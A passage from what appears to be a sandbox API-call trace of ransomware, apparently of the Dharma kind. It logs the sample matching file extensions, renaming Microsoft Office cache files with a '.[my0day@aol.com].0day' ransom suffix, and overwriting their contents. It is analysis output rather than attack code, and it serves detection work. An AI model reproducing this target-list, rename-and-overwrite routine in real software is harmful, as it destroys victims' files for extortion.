lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString=".xls") returned 4 [0044.959] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString=".xlsx") returned 5 [0044.959] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0044.959] lstrlenW (lpString=".ppt") returned 4 [0044.959] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString=".zip") returned 4 [0044.959] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString=".rar") returned 4 [0044.959] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString=".bz2") returned 4 [0044.959] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.959] lstrlenW (lpString=".7z") returned 3 [0044.959] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString=".dbf") returned 4 [0044.959] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString=".1cd") returned 4 [0044.959] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString=".jpg") returned 4 [0044.959] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString=".doc") returned 4 [0044.960] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString=".docx") returned 5 [0044.960] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0044.960] lstrlenW (lpString=".pdf") returned 4 [0044.960] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString=".xls") returned 4 [0044.960] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString=".xlsx") returned 5 [0044.960] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0044.960] lstrlenW (lpString=".ppt") returned 4 [0044.960] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString=".zip") returned 4 [0044.960] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString=".rar") returned 4 [0044.960] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.960] lstrlenW (lpString=".bz2") returned 4 [0044.960] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.960] lstrlenW (lpString=".7z") returned 3 [0044.960] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString=".dbf") returned 4 [0044.960] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString=".1cd") returned 4 [0044.960] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.960] lstrlenW (lpString=".jpg") returned 4 [0044.960] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.960] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0044.961] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0044.961] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0044.961] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=222948913) returned 1 [0044.961] CloseHandle (hObject=0x194) returned 1 [0044.961] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0044.961] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.961] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0044.962] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.962] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.962] ReadFile (in: hFile=0x194, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.967] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.968] ReadFile (in: hFile=0x194, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.973] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.973] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.973] ReadFile (in: hFile=0x194, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.987] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.987] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0045.004] SetEndOfFile (hFile=0x194) returned 1 [0045.004] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0045.004] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.004] WriteFile (in: hFile=0x194, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.266] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.275] WriteFile (in: hFile=0x194, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.277] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.277] WriteFile (in: hFile=0x194, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.279] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0045.653] CloseHandle (hObject=0x194) returned 1 [0045.653] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString=".doc") returned 4 [0045.654] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString=".docx") returned 5 [0045.654] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0045.654] lstrlenW (lpString=".pdf") returned 4 [0045.654] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString=".xls") returned 4 [0045.654] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString=".xlsx") returned 5 [0045.654] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0045.654] lstrlenW (lpString=".ppt") returned 4 [0045.654] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString=".zip") returned 4 [0045.654] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString=".rar") returned 4 [0045.654] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString=".bz2") returned 4 [0045.654] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.654] lstrlenW (lpString=".7z") returned 3 [0045.654] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString=".dbf") returned 4 [0045.654] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString=".1cd") returned 4 [0045.654] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.654] lstrlenW (lpString=".jpg") returned 4 [0045.654] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString=".doc") returned 4 [0045.655] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString=".docx") returned 5 [0045.655] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0045.655] lstrlenW (lpString=".pdf") returned 4 [0045.655] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString=".xls") returned 4 [0045.655] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString=".xlsx") returned 5 [0045.655] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0045.655] lstrlenW (lpString=".ppt") returned 4 [0045.655] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString=".zip") returned 4 [0045.655] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString=".rar") returned 4 [0045.655] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString=".bz2") returned 4 [0045.655] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.655] lstrlenW (lpString=".7z") returned 3 [0045.655] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString=".dbf") returned 4 [0045.655] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString=".1cd") returned 4 [0045.655] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0045.655] lstrlenW (lpString=".jpg") returned 4 [0045.655] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.656] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0045.656] lstrlenW (lpString="Office32WW.msi") returned 14 [0045.656] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0045.659] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=1992192) returned 1 [0045.659] CloseHandle (hObject=0x194) returned 1 [0045.659] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0045.659] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.659] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0045.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0045.660] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.660] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.660] ReadFile (in: hFile=0x194, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.667] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.667] ReadFile (in: hFile=0x194, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.674] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.674] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.674] ReadFile (in: hFile=0x194, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.690] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.690] WriteFile (in: hFile=0x194, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0046.115] SetEndOfFile (hFile=0x194) returned 1 [0046.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3faa0a8 [0046.425] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.425] WriteFile (in: hFile=0x194, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.433] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.433] WriteFile (in: hFile=0x194, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.435] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.435] WriteFile (in: hFile=0x194, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0046.440] CloseHandle (hObject=0x194) returned 1 [0046.440] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString=".doc") returned 4 [0046.441] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.441] lstrlenW (lpString=".docx") returned 5 [0046.441] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0046.441] lstrlenW (lpString=".pdf") returned 4 [0046.441] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.441] lstrlenW (lpString=".xls") returned 4 [0046.441] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.441] lstrlenW (lpString=".xlsx") returned 5 [0046.441] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0046.441] lstrlenW (lpString=".ppt") returned 4 [0046.441] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString=".zip") returned 4 [0046.441] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.441] lstrlenW (lpString=".rar") returned 4 [0046.441] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.441] lstrlenW (lpString=".bz2") returned 4 [0046.441] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.441] lstrlenW (lpString=".7z") returned 3 [0046.441] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString=".dbf") returned 4 [0046.441] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString=".1cd") returned 4 [0046.441] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.441] lstrlenW (lpString=".jpg") returned 4 [0046.441] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString=".doc") returned 4 [0046.442] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.442] lstrlenW (lpString=".docx") returned 5 [0046.442] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0046.442] lstrlenW (lpString=".pdf") returned 4 [0046.442] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.442] lstrlenW (lpString=".xls") returned 4 [0046.442] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.442] lstrlenW (lpString=".xlsx") returned 5 [0046.442] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0046.442] lstrlenW (lpString=".ppt") returned 4 [0046.442] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString=".zip") returned 4 [0046.442] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.442] lstrlenW (lpString=".rar") returned 4 [0046.442] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.442] lstrlenW (lpString=".bz2") returned 4 [0046.442] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.442] lstrlenW (lpString=".7z") returned 3 [0046.442] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString=".dbf") returned 4 [0046.442] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString=".1cd") returned 4 [0046.442] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0046.442] lstrlenW (lpString=".jpg") returned 4 [0046.442] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.443] lstrcmpiW (lpString1=".xrm-ms", lpString2=".0day") returned 1 [0046.443] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0046.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.600] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=715834) returned 1 [0047.606] CloseHandle (hObject=0x198) returned 1 [0047.607] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0047.607] GetFileAttributesW (lpFileName="C:\\MSOCache\\All 